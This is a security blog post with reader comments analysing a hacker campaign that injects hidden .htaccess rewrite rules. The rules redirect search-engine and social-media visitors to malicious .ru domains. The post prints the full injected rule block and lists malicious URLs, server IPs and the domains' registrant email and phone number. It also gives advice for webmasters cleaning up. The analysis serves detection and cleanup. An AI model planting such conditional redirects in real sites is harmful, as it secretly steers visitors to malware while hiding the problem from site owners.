msgbartop
Unmask Parasites - Check your web pages for hidden links, iframes, malicious scripts, unauthorized redirects and other signs of security problems.
msgbarbottom
Loading site search ...

Htaccess Redirect to Example.ru/dir/index.php

   14 Oct 10   Filed in Website exploits

Having read the Sucuri’s article about the kirm-sky .ru attack, I decided to complement it with my own information.

I started to track this website infection back in April. It has been active all these months.

Compromised sites redirect search engine traffic to malicious sites. The rest traffic is not affected, which helps hide the problem from webmasters who rarely click on search results to open their own sites. However, this problem is easily detected by Google’s malware scanners, and many webmasters learn about the problem when web browsers start blocking their sites.

Unmask Parasites can also detect the problem and report the malicious 301 redirect.

301 redirect to kirm-sky

Conditional redirect rules

Hackers inject the following rewrite rules into .htaccess files:

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*baidu.* [OR]
RewriteCond %{HTTP_REFERER} .*youtube.* [OR]
RewriteCond %{HTTP_REFERER} .*wikipedia.* [OR]
RewriteCond %{HTTP_REFERER} .*qq.* [OR]
RewriteCond %{HTTP_REFERER} .*excite.* [OR]
RewriteCond %{HTTP_REFERER} .*altavista.* [OR]
RewriteCond %{HTTP_REFERER} .*msn.* [OR]
RewriteCond %{HTTP_REFERER} .*netscape.* [OR]
RewriteCond %{HTTP_REFERER} .*aol.* [OR]
RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]
RewriteCond %{HTTP_REFERER} .*goto.* [OR]
RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]
RewriteCond %{HTTP_REFERER} .*mamma.* [OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]
RewriteCond %{HTTP_REFERER} .*lycos.* [OR]
RewriteCond %{HTTP_REFERER} .*search.* [OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]
RewriteCond %{HTTP_REFERER} .*bing.* [OR]
RewriteCond %{HTTP_REFERER} .*dogpile.* [OR]
RewriteCond %{HTTP_REFERER} .*facebook.* [OR]
RewriteCond %{HTTP_REFERER} .*twitter.* [OR]
RewriteCond %{HTTP_REFERER} .*blog.* [OR]
RewriteCond %{HTTP_REFERER} .*live.* [OR]
RewriteCond %{HTTP_REFERER} .*myspace.* [OR]
RewriteCond %{HTTP_REFERER} .*mail.* [OR]
RewriteCond %{HTTP_REFERER} .*yandex.* [OR]
RewriteCond %{HTTP_REFERER} .*rambler.* [OR]
RewriteCond %{HTTP_REFERER} .*ya.* [OR]
RewriteCond %{HTTP_REFERER} .*aport.* [OR]
RewriteCond %{HTTP_REFERER} .*linkedin.* [OR]
RewriteCond %{HTTP_REFERER} .*flickr.*
RewriteRule ^(.*)$ http://networkdevision .ru/targetfile/index.php [R=301,L]

The redirect rules are quite straight forward. All those RewriteCond line check if a vistor came from one of those sites (e.g. Google, Yahoo, Wikipedia, YouTube, Twitter, Flickr, etc) and redirect them (the last RewriteRule line) to a malicious site.

.htaccess tricks

To hide these rules, hackers inject several screens of blank lines before the malicious code and unless you scroll all the way down, you may think that your .htaccess file doesn’t contain anything suspicious.

Another trick is to place this file above the site root. Many web servers are configured to take this upper level directory into account. (You can read here how one webmaster learnt these tricks searching for the malicious code)

URL pattern

URLs of the malicious sites change quite often, but they all follow this pattern: example.ru/dir/index.php, where example.ru is some malicious domain with the .ru TLD, and dir is some some random directory. Here are examples of such URLs

  • two-part .ru/my/index.php
  • etc-network .ru/may/index.php
  • thermalvisit .ru/spa/index.php
  • awm-magazine .ru/ofmy/index.php
  • strikeallow .ru/hel/index.php
  • sensationworld .ru/pub/index.php
  • sensation-world .ru/website/index.php
  • ros-tec .ru/onlinestore/index.php
  • julyrelax .ru/catalog/index.php
  • nanovoice .ru/webalizer/index.php
  • woods-every .ru/thumbs/index.php
  • class-woods .ru/contactus/index.php
  • tuta-anti .ru/engine/index.php
  • ar-kirm .ru/modules/index.php
  • kirmar .ru/rawimages/index.php
  • sky-ar .ru/idial/index.php
  • kirm-sky .ru/promocash/index.php
  • skykirm .ru/zeleboba/index.php
  • devisionnetwork .ru/suomi/index.php
  • networkdevision .ru/targetfile/index.php

In April, hackers hackers didn’t use directories in such URLs, though (e.g. cut-etc .ru/index.php).

Domains and servers

All these domains are registered by someone with email address ivan-sushkin@yandex.ru and phone number +7 926 3411572 (this personal info can be forged). Domains are registered in small batches — you can identify them by similar names. E.g ar-kirm .ru, kirmar .ru, sky-ar .ru and skykirm .ru were registered on September 22nd and the most recent batch that includes devisionnetwork .ru and networkdevision .ru, had been registered just a few days ago on October 10th.

Not only does this attack changes domains names of the malicious sites, it also changes IP addresses of servers with the malicious content (most likely they have to move when network administrators disconnect their servers after numerous abuse reports).

During the last six months they used servers with the following IP addresses

  • 194 .79 .250 .54 — Vladivostok Zhek-universal Ltd (Russian Federation)
  • 109 .196 .134 .52 — Lomonosov Vline Ltd (Russian Federation)
  • 109 .196 .143 .89 — Moscow Vline Ltd (Russian Federation)
  • 91. 204 .48 .37 — S.point (Ukraine) – currently used

Malicious redirects on disables sites

I noticed interesting thing. Sometimes hosting providers temporarily shut down websites (either because of security problems or simply because they owner delay payment) and redirect visitors to a page that usually reads like “The website you were trying to reach is temporarily unavailable. ” The thing is, this hoster’s redirect has lower priority than the malicious redirect in .htaccess files. As a result, despite of all hosters efforts, such disabled sites are still dangerous if people click on their links in search engine results.

Infection vector

Although David thinks it’s an osCommerce-specific attack, I’ve seen it on many sites that don’t use osCommerse. To my mind, the FTP vector is more probable. Moreover, many infected sites contain other types of malicious code at the same time, so it could be just a coincidence that David found this .htaccess exploit on hacked osCommerce sites. Or maybe hackers started to diversify their infection methods — who knows. Please leave a comment below if you have any information that can prove either hypothesis.

To webmasters

In any case, it’s always a good idea to start with checking your own computer for malware. Than change all site passwords and keep them secure (don’t save them in your FTP clients, instead, you might want to try this KeePass trick). Finally, remove the malicious redirect rules from .htaccess files. Additionally, you can check for backdoor scripts, mentioned by David and make sure all third-party scripts are fully patched and properly hardened.

If your site is in Google’s blacklist, you’ll need to request a malware review.

Have your say

Did I miss anything? Your comments are welcome!

Related posts:

Reader's Comments (8)

  1. |

    [...] This post was mentioned on Twitter by Denis, Rhonda Kreklau. Rhonda Kreklau said: Htaccess Redirect to Example.ru/dir/index.php – http://blog.unmaskparasites.com/2010/10/14/htaccess-redirect-to-example-rudirindex-php-2/ [...]

  2. |

    Some more domain names and malicious redirect URLs:

    devision-panel .ru/crem/index.php
    network-devision .ru

  3. |

    Hey,
    Thanx man, I had my client’s oscommerce site hacked several times. Thinking of moving to magento. what do you think?

  4. |

    Hi
    I came here via your related update article which mentioned the redirect url http://landriver44 .ru/in.cgi?10 [R=301,L]

    I came across this one on a hacked osCommerce site but the search engine redirect .htaccess file was not in the public_html folder but was, in fact, one directory higher in the site root.

    Initial attempts to clear the site from google met with failure as I was only ftp’ing from the public_html folder and not higher

  5. |

    Have the same problem. Changed the owner of .htaccess to root and in several days the site was hacked once again. It seems like it is not just a FTP-hacking…

  6. |

    Hi ! this is happening to joomla sites too. Every single month we get the same thing!!
    latest domain is: TEYLSOFT.RU
    and the user is the same one:
    ivan-sushkin@yandex.ru

    Even our html sites are re-directed

    My question is, what can be done to stop this person/s ????
    What is the point? and why does he keep getting domains?

    thank you!!

  7. |

    I do not keep FTP-password on my computer.
    I deleted all the htaccess-files. The vulnerability i could not find. Help me.

  8. |

    Okay folks, well I too have just experienced this htaccess redirect problem.

    I am running two types of self-hosted web servers for my wordpress sites, a mac-mini and a windows mini with wamp developer-pro.

    This has only happened on my windows server, which runs about 50 websites.

    All my traffic was being directed to a russian site on each and every one of my websites on the windows server, and I found that this occurred due to a second htaccess file that was being cretaed in the webroot folder of every site, even non-functioning sites.

    By deleting this file (which has no file name btw), my site became clean, as tested with sucuri.

    http://sitecheck.sucuri.net/

    Anyway, I would delete the file, and it would however re-appear within the hour.

    I also noticed that this file would break my permalinks, so I would go in, re-save the permalinks (which fixed the problem), but guess what? A new htaccess file was being created immediately.

    This htaccess file by the way had redirects to a russian .ru site amongst others, but you had to scroll down the htaccess file to see these redirects.

    Anyway, I also noticed that my ftp server, although closed, was running from the taskmanager, and I couldn’t shut it.

    I started trying to find the file that was re-creating these htaccess files, but I could find no menacing looking file anywhere.

    So I decided to slowly move less important sites out of my server root and into a new temp folder, and it was then that I noticed that one site COULD NOT BE CUT and PASTED!

    So I started cutting and pasting individual folders/files within the site, until I came to the last remaining file, which gave me the following error when I tried to cut or delete.

    “Cannot delete because the file is open in httpd.exe”

    What was this file?

    Believe it or not, it was a font file, located in a plugin on the last placed website on my server.

    wampdeveloper>websites>www.website.com>webroot>wp-content>plugins>si-contact-form>captcha-secureimage>ttffonts>ahg-bold

    So I shut down apache, and then I was able to delete this file.

    But then, I could no start up apache anymore, possibly because httpd.exe was calling this malicious file and could no longer find it.

    Right now I am in the process of re-installing wampdeveloperpro.

    I am having problems here too, because even though wampdeveloperpro has been shut down, the system will not let me delete it. I had to reboot in safe mode to delete and re-install.

    Luckily I have backups of all my sites, but I am not yet sure if I will encounter any more problems.

    BTW, I shut down access to the ftp server by closing port 21 on my firewall.

    Hope this helps and would be interested in any other users who have had malware problems on a windows/wampdeveloperpro server.